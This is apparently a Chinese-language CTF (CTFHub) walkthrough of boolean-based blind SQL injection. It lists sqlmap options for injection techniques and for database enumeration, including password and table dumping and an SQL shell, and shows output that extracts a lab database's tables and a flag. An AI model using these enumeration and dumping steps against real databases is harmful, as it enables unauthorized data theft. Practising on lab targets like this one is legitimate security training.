web渗透布尔盲注
薛谔布尔盲注
1 2 3 4 5 6
| available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] sqli
|
技术 #
以下选项用于调整特定 SQL 注入技术的测试方法
1 2 3 4 5 6 7 8 9 10
| --technique=TECH B: Boolean-based blind SQL injection(布尔型盲注) E: Error-based SQL injection(报错型注入) U: UNION query SQL injection(联合查询注入) S: Stacked queries SQL injection(堆查询注入) T: Time-based blind SQL injection(时间型盲注) Q: inline Query injection(内联查询注入)
--time-sec=TIMESEC --second-order=S..
|
枚举 #
以下选项用于获取数据库的信息,结构和数据表中的数据。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| -a, --all -b, --banner --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles
--dbs --tables --columns --schema --count --dump --stop 10 -D DB -T TBL -C COL --sql-query=QUERY --sql-shell
|
1 2 3 4 5 6
| Database: sqli [2 tables] +------+ | flag | | news | +------+
|
1 2 3 4 5 6 7 8 9
| Database: sqli Table: flag [1 column] +--------+--------------+ | Column | Type | +--------+--------------+ | flag | varchar(110) | +--------+--------------+
|
1 2 3 4 5 6 7 8
| Database: sqli Table: flag [1 entry] +-----------------+ | flag | +-----------------+ | ctfhub{9766ed9X | +-----------------+
|